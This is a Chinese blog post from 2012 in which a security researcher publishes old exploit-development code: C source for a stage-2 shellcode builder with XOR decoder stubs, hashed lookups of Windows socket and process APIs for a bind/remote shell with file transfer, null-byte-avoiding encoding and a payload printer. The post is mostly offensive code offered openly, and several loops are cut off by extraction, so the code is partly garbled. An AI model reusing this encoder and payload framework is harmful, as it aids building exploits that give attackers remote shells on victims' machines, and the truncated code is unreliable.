Chinaunix首页 | 论坛 | 博客
  • 博客访问: 1202902
  • 博文数量: 272
  • 博客积分: 3899
  • 博客等级: 中校
  • 技术积分: 4734
  • 用 户 组: 普通用户
  • 注册时间: 2012-06-15 14:53
文章分类

全部博文(272)

文章存档

2012年(272)

分类: 服务器与存储

2012-06-26 13:17:21

    由于个人职业发展的原因,以后可能不会再深入研究这方面的东西了,只会当作纯粹的兴趣爱好。

   
我最近都在研究WEB和浏览器安全,以及安全设计方面的工作。所以为了让这些烂在我硬盘里的东西能够更好的发挥作用,能够更加的open,我决定公开这些已经烂掉的东西,也算是对自己过去的一个交代。

    shellcode
是一项非常具有艺术性的工作,可以对shellcode做加密,可以自己在shellcode里实现 一个协议,可以直接执行一个PE文件,如果是IE里的,可以对抗主动防御,可以通用不挂浏览器,文件型的功能就更多了。
    
   
躺在我硬盘里的shellcode太多了,很多我也忘记了原本的功能,也忘记了哪段代码有没有bug,哪段是最新的。如果贴错代码了,就当是POC

   
这里我贴一个简单的上传文件和下载文件的shellcode,如果以前有朋友用过我写的exploit,应该使用过这个功能,在shell里直接可以上传和下载文件。

   
这段shellcode是一个stage2shellcode。这种思想是分段发送shellcode,先发送stage1 shellcode,然后stage1shellcode会接收stage2 shellcode去执行。一般来说stage1 shellcode会短小精悍,stage2 shellcode则会比较强大。下面的shellcodestage 2 shellcode的演示.

    PS
:我以后不会再公开任何漏洞利用的exploit了。

   
最后,再次向shellcoder们致敬。欢迎和我一起讨论任何技术问题。

/*
author: axis@ph4nt0m.org
Team: Ph4nt0m Security Team ()
Date: 2007

*/

#include
#include

#define PROC_BEGIN __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90\
                   __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90 __asm _emit 0x90
#define PROC_END PROC_BEGIN

#define Xor_key 0x33;

unsigned char sh_Buff[2048];
unsigned int sh_Len;
unsigned int Enc_key=0x99;

unsigned char decode1[] =
/*
00401004   . /EB 0E         JMP SHORT encode.00401014
00401006   $ |5B            POP EBX
00401007   . |4B            DEC EBX
00401008   . |33C9          XOR ECX,ECX
0040100A   . |B1 FF         MOV CL,0FF
0040100C   > |80340B 99     XOR BYTE PTR DS:[EBX+ECX],99
00401010   .^|E2 FA         LOOPD SHORT encode.0040100C
00401012   . |EB 05         JMP SHORT encode.00401019
00401014   > \E8 EDFFFFFF   CALL encode.00401006
*/
"\xEB\x0E\x5B\x4B\x33\xC9\xB1"
"\xFF"          // shellcode size
"\x80\x34\x0B"
"\x99"          // xor byte
"\xE2\xFA\xEB\x05\xE8\xED\xFF\xFF\xFF";

unsigned 
char decode2[] =
/* ripped from eyas
00406030   /EB 10           JMP SHORT 00406042
00406032   |5B              POP EBX
00406033   |4B              DEC EBX
00406034   |33C9            XOR ECX,ECX
00406036   |66:B9 6601      MOV CX,166
0040603A   |80340B 99       XOR BYTE PTR DS:[EBX+ECX],99
0040603E ^|E2 FA           LOOPD SHORT 0040603A
00406040   |EB 05           JMP SHORT 00406047
00406042   \E8 EBFFFFFF     CALL 00406032
*/
"\xEB\x10\x5B\x4B\x33\xC9\x66\xB9"
"\x66\x01"      // shellcode size
"\x80\x34\x0B"
"\x99"          // xor byte
"\xE2\xFA\xEB\x05\xE8\xEB\xFF\xFF\xFF";

// kernel32.dll functions index
#define _LoadLibraryA           0x00
#define _CreateProcessA         0x04
#define _TerminateProcess       0x08
//#define _ExitThread             0x08
#define _CreatePipe             0x0C
#define _CreateNamedPipeA       0x10
#define _CloseHandle            0x14
#define _CreateEventA           0x18
#define _WaitForMultipleObjects 0x1C
#define _GetOverlappedResult    0x20
#define _CreateFileA            0x24
#define _ReadFile               0x28
#define _WriteFile              0x2C
#define _WaitForSingleObjectEx 0x30
#define _Sleep                  0x34
// ws2_32.dll functions index
#define _WSAStartup             0x38
#define _WSASocketA             0x3C
#define _setsockopt             0x40
#define _bind                   0x44
#define _listen                 0x48
#define _accept                 0x4C
#define _recv                   0x50
#define _send                   0x54
#define _WSACreateEvent         0x58
#define _WSAEventSelect         0x5C
#define _WSAEnumNetworkEvents   0x60
#define _ioctlsocket            0x64
#define _closesocket            0x68
// data index
#define _lsck                   0x6C
#define _hsck                   0x70    // socket handle
#define _hin0                   0x74    // transferring data to subprocess. incoming handler
#define _hin1                   0x78    // outgoing
#define _hout0                  0x7C    // Create named pipe and open it. incoming handler
#define _hout1                  0x80    // outgoing
#define _pi0                    0x84
#define _pi1                    0x88
#define _epip                   0x8C
#define _esck                   0x90
#define _flg                    0x94
#define _lap                    0x98
#define _cnt                    0xAC
#define _pbuf                   0xB0
#define _sbuf                   0xF0

// functions number
#define _Knums                  14
#define _Wnums                  13

// Need functions
unsigned char functions[100][128] =
{
    // kernel32
    {"LoadLibraryA"},
    {"CreateProcessA"},
    {"TerminateProcess"},
//    {"ExitThread"},
    {"CreatePipe"},
    {"CreateNamedPipeA"},
    {"CloseHandle"},
    {"CreateEventA"},
    {"WaitForMultipleObjects"},
    {"GetOverlappedResult"},
    {"CreateFileA"},
    {"ReadFile"},
    {"WriteFile"},
    {"WaitForSingleObjectEx"},
    {"Sleep"},

    // ws2_32
    {"WSAStartup"},
    {"WSASocketA"},
    {"setsockopt"},
    {"bind"},
    {"listen"},
    {"accept"},
    {"recv"},
    {"send"},
    {"WSACreateEvent"},
    {"WSAEventSelect"},
    {"WSAEnumNetworkEvents"},
    {"ioctlsocket"},
    {"closesocket"},
    
    // data
    {""},
};

void PrintSc(unsigned char *lpBuff, int buffsize);
void ShellCode();

// Get function hash
unsigned long hash(unsigned char *c)
{
    unsigned long h=0;
    while(*c)
    {
        h = ( ( h << 25 ) | ( h >> 7 ) ) + *c++;
    }
    return h;
}

// get shellcode
void GetShellCode()
{
    char *fnbgn_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    char *fnend_str="\x90\x90\x90\x90\x90\x90\x90\x90\x90";
    unsigned char *pSc_addr;
    unsigned char pSc_Buff[2048];
    unsigned int   MAX_Sc_Len=0x2000;
    unsigned long dwHash[100];
    unsigned int   dwHashSize;

    int l,i,j,k;

    // Get functions hash
    for (i=0;;i++) {
        if (functions[i][0] == '\x0') break;

        dwHash[i] = hash(functions[i]);
        //fprintf(stderr, "%.8X\t%s\n", dwHash[i], functions[i]);
    }
    dwHashSize = i*4;

    // Deal with shellcode
    pSc_addr = (unsigned char *)ShellCode;

    for (k=0;k         if(memcmp(pSc_addr+k,fnbgn_str, 8)==0) {
            break;
        }
    }
    pSc_addr+=(k+8);   // start of the ShellCode
    
    for (k=0;k         if(memcmp(pSc_addr+k,fnend_str, 8)==0) {
            break;
        }
    }
    sh_Len=k; // length of the ShellCode
    
    memcpy(pSc_Buff, pSc_addr, sh_Len);

    // Add functions hash
    memcpy(pSc_Buff+sh_Len, (unsigned char *)dwHash, dwHashSize);
    sh_Len += dwHashSize;

    //printf("%d bytes shellcode\n", sh_Len);
    // print shellcode
    //PrintSc(pSc_Buff, sh_Len);

    // find xor byte
    for(i=0xff; i>0; i--)
    {
        l = 0;
        for(j=0; j         {
            if ( 
//                   ((pSc_Buff[j] ^ i) == 0x26) ||    //%
//                   ((pSc_Buff[j] ^ i) == 0x3d) ||    //=
//                   ((pSc_Buff[j] ^ i) == 0x3f) ||    //?
//                   ((pSc_Buff[j] ^ i) == 0x40) ||    //@
                   ((pSc_Buff[j] ^ i) == 0x00) //||
//                   ((pSc_Buff[j] ^ i) == 0x0D) ||
//                   ((pSc_Buff[j] ^ i) == 0x0A) ||
//                   ((pSc_Buff[j] ^ i) == 0x5C)
                )
            {
                l++;
                break;
            };
        }

        if (l==0)
        {
            Enc_key = i;
            //printf("Find XOR Byte: 0x%02X\n", i);
            for(j=0; j             {
                pSc_Buff[j] ^= Enc_key;
            }

            break;                        // break when found xor byte
        }
    }

    // No xor byte found
    if (l!=0){
        //fprintf(stderr, "No xor byte found!\n");

        sh_Len = 0;
    }
    else {
        //fprintf(stderr, "Xor byte 0x%02X\n", Enc_key);

        // encode
        if (sh_Len > 0xFF) {
            *(unsigned short *)&decode2[8] = sh_Len;
            *(unsigned char *)&decode2[13] = Enc_key;

            memcpy(sh_Buff, decode2, sizeof(decode2)-1);
            memcpy(sh_Buff+sizeof(decode2)-1, pSc_Buff, sh_Len);
            sh_Len += sizeof(decode2)-1;
        }
        else {
            *(unsigned char *)&decode1[7] = sh_Len;
            *(unsigned char *)&decode1[11] = Enc_key;

            memcpy(sh_Buff, decode1, sizeof(decode1)-1);
            memcpy(sh_Buff+sizeof(decode1)-1, pSc_Buff, sh_Len);
            sh_Len += sizeof(decode1)-1;
        }
    }
}

// print shellcode
void PrintSc(unsigned char *lpBuff, int buffsize)
{
    int i,j;
    char *p;
    char msg[4];
    printf("/* %d bytes */\n",buffsize);
    for(i=0;i     {
        if((i%16)==0)
            if(i!=0)
                printf("\"\n\"");
            else
                printf("\"");
        sprintf(msg,"\\x%.2X",lpBuff[i]&0xff);
        for( p = msg, j=0; j < 4; p++, j++ )
        {
            if(isupper(*p))
                printf("%c", _tolower(*p));
            else
                printf("%c", p[0]);
        }
    }
   printf( "\";\n");
}

 

阅读(1211) | 评论(0) | 转发(0) |
给主人留下些什么吧!~~